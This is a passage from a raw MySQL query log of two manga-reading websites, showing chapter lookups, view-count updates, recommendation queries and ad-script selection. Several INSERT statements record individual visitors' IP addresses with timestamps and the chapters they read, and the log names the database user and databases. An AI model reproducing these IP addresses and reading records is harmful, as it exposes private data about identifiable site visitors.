m join chapters as c on (c.manga_id = m.id) where m.id = '158' and m.active = 1 330651947 Quit 330651948 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651948 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='158' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Mystery%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330651948 Quit 330651949 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651950 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651949 Quit 330651950 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651950 Quit 330651951 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651952 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651951 Quit 330651952 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651952 Quit 330651953 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651954 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651953 Quit 330651954 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651954 Quit 330651955 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651956 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651955 Quit 330651956 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651956 Quit 330651957 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651958 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651957 Quit 330651958 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1384' and m.active = 1 330651958 Quit 330651959 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651959 Query select * FROM chapters where id = '1384' 330651959 Quit 330651960 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651960 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330651960 Quit 330651961 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651961 Query Update chapters set view=view+1 where id = '1384' 330651961 Quit 330651962 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651962 Query select * FROM chapters where id = '1384' 330651963 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651963 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1384' and m.active = 1 330651962 Quit 330651963 Quit 330651964 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651964 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('20', '1384', '24.131.64.50', 'mangaberri.com', '2026-02-26 03:29:13', '2026-02-26 03:29:13') 330651964 Quit 330651965 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651965 Query select * FROM chapter_images where chapter_id = '1384' 330651965 Quit 330651966 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651966 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330651966 Quit 330651967 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651967 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330651967 Quit 330651968 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651969 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651969 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651968 Quit 330651969 Quit 330651970 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651971 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651970 Quit 330651971 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651971 Quit 330651972 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651973 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651972 Quit 330651973 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651973 Quit 330651974 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651975 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651975 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651974 Quit 330651975 Quit 260225 19:29:14 330651976 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651977 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651976 Quit 330651977 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6891' and m.active = 1 330651977 Quit 330651978 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651978 Query select * FROM chapters where id = '6891' 330651978 Quit 330651979 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651979 Query select * FROM chapters where manga_id = '175' order by display_priority ASC, id desc 330651979 Quit 330651980 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651980 Query Update chapters set view=view+1 where id = '6891' 330651980 Quit 330651981 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651981 Query select * FROM chapters where id = '6891' 330651982 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651981 Quit 330651982 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6891' and m.active = 1 330651982 Quit 330651983 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651983 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('175', '6891', '31.215.0.51', 'mangaberri.com', '2026-02-26 03:29:14', '2026-02-26 03:29:14') 330651983 Quit 330651984 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651984 Query select * FROM chapter_images where chapter_id = '6891' 330651984 Quit 330651985 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651985 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '175' and m.active = 1 330651985 Quit 330651986 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651986 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='175' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Ecchi%' OR genres like '%Fantasy%' OR genres like '%Horror%' OR genres like '%Mystery%' OR genres like '%Slice of Life%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330651986 Quit 330651987 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651988 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651987 Quit 330651988 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651988 Quit 330651989 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651990 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651989 Quit 330651990 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651990 Quit 330651991 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651992 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651991 Quit 330651992 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651992 Quit 330651993 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651994 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330651993 Quit 330651994 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651994 Quit 260225 19:29:15 330651995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651995 Quit 330651996 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2564' 330651996 Quit 330651997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651997 Query select * FROM chapters where id = '2564' 330651997 Quit 330651998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651998 Query select * FROM chapters where manga_id = '64' order by id desc 330651998 Quit 330651999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651999 Query Update chapters set view=view+1 where id = '2564' 330651999 Quit 330652000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652000 Query select * FROM chapters where id = '2564' 330652000 Quit 330652001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652001 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2564' 330652001 Quit 330652002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652002 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('64', '2564', '2001:863:36b:c5fa:f5ca:469e:d620:461d', 'mangacherri.com', '2026-02-26 03:29:15', '2026-02-26 03:29:15') 330652002 Quit 330652003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652003 Query select * FROM chapter_images where chapter_id = '2564' 330652003 Quit 330652004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652004 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '64' and m.active = 1 330652004 Quit 330652005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652005 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='64' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330652005 Quit 330652006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652006 Quit 330652007 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652007 Quit 330652008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652008 Quit 330652009 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652009 Quit 330652010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652010 Quit 330652011 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652011 Quit 330652012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652012 Quit 330652013 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652013 Quit 260225 19:29:16 330652014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652014 Quit 330652015 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1107' 330652015 Quit 330652016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652016 Query select * FROM chapters where id = '1107' 330652016 Quit 330652017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652017 Query select * FROM chapters where manga_id = '33' order by id desc 330652017 Quit 330652018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652018 Query Update chapters set view=view+1 where id = '1107' 330652018 Quit 330652019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652019 Query select * FROM chapters where id = '1107' 330652019 Quit 330652020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652020 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1107' 330652020 Quit 330652021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652021 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('33', '1107', '103.159.156.33', 'mangacherri.com', '2026-02-26 03:29:16', '2026-02-26 03:29:16') 330652021 Quit 330652022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652022 Query select * FROM chapter_images where chapter_id = '1107' 330652022 Quit 330652023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652023 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '33' and m.active = 1 330652023 Quit 330652024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652024 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='33' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330652025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652025 Quit 330652026 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '13212' 330652026 Quit 330652027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652027 Query select * FROM chapters where id = '13212' 330652027 Quit 330652028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652028 Query select * FROM chapters where manga_id = '197' order by id desc 330652028 Quit 330652029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652029 Query Update chapters set view=view+1 where id = '13212' 330652029 Quit 330652030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652030 Query select * FROM chapters where id = '13212' 330652030 Quit 330652031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652031 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '13212' 330652031 Quit 330652032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652032 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '13212', '2a02:26f7:d6c1:680c:0:1000:0:8', 'mangacherri.com', '2026-02-26 03:29:16', '2026-02-26 03:29:16') 330652032 Quit 330652033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652033 Query select * FROM chapter_images where chapter_id = '13212' 330652033 Quit 330652034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652034 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330652034 Quit 330652035 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652035 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330652024 Quit 330652036 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652037 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652036 Quit 330652037 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652037 Quit 330652038 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652039 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652038 Quit 330652039 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652039 Quit 330652040 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652041 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652040 Quit 330652041 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652041 Quit 330652042 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652043 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652042 Quit 330652043 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652043 Quit 330652035 Quit 330652044 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652045 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652044 Quit 330652045 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652045 Quit 330652046 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652047 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652046 Quit 330652047 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652047 Quit 330652048 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652049 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652048 Quit 330652049 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652049 Quit 330652050 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652051 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652050 Quit 330652051 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652051 Quit 260225 19:29:17 330652052 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652053 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652052 Quit 330652053 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7989' and m.active = 1 330652053 Quit 330652054 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652054 Query select * FROM chapters where id = '7989' 330652054 Quit 330652055 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652055 Query select * FROM chapters where manga_id = '35' order by display_priority ASC, id desc 330652055 Quit 330652056 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652056 Query Update chapters set view=view+1 where id = '7989' 330652056 Quit 330652057 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652057 Query select * FROM chapters where id = '7989' 330652058 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652057 Quit 330652058 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7989' and m.active = 1 330652058 Quit 330652059 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652059 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('35', '7989', '75.72.250.102', 'mangaberri.com', '2026-02-26 03:29:17', '2026-02-26 03:29:17') 330652059 Quit 330652060 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652060 Query select * FROM chapter_images where chapter_id = '7989' 330652060 Quit 330652061 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652061 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330652061 Quit 330652062 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652062 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='35' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Fantasy%' OR genres like '%Military%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330652062 Quit 330652063 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652064 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652063 Quit 330652064 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652064 Quit 330652065 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652066 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652065 Quit 330652066 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652066 Quit 330652067 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652068 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652067 Quit 330652068 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652068 Quit 330652069 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652070 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330652069 Quit 330652070 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652070 Quit 330652071 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652072 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652071 Quit 330652072 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12468' 330652072 Quit 330652073 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652073 Query select * FROM chapters where id = '12468' 330652073 Quit 330652074 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652074 Query select * FROM chapters where manga_id = '239' order by id desc 330652074 Quit 330652075 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652075 Query Update chapters set view=view+1 where id = '12468' 330652075 Quit 330652076 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652076 Query select * FROM chapters where id = '12468' 330652076 Quit 330652077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652077 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12468' 330652077 Quit 330652078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652078 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12468', '15.235.98.98', 'mangacherri.com', '2026-02-26 03:29:17', '2026-02-26 03:29:17') 330652078 Quit 330652079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652079 Query select * FROM chapter_images where chapter_id = '12468' 330652079 Quit 330652080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652080 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330652080 Quit 330652081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652081 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 260225 19:29:18 330652081 Quit 330652082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652082 Quit 330652083 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330652083 Quit 330652084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652084 Quit 330652085 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652085 Quit 330652086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652086 Quit 330652087 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652087 Quit 330652088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652088 Quit 330652089 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330652089 Quit 260225 19:29:19 330652090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652090 Quit 330652091 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4808' 330652091 Quit 330652092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652092 Query select * FROM chapters where id = '4808' 330652092 Quit 330652093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652093 Query select * FROM chapters where manga_id = '97' order by id desc 330652093 Quit 330652094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652094 Query Update chapters set view=view+1 where id = '4808' 330652094 Quit 330652095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652095 Query select * FROM chapters where id = '4808' 330652096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652095 Quit 330652096 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4808' 330652096 Quit 330652097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652097 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('97', '4808', '2402:1980:c15:b169:dd57:bb86:a776:a33f', 'mangacherri.com', '2026-02-26 03:29:19', '2026-02-26 03:29:19') 330652097 Quit 330652098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652098 Query select * FROM chapter_images where chapter_id = '4808' 330652098 Quit 330652099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652099 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '97' and m.active = 1 330652099 Quit 330652100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652100 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='97' and m.active = 1 AND (genres like '%Music%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330652100 Quit 330652101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330652101 Quit 330652102 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 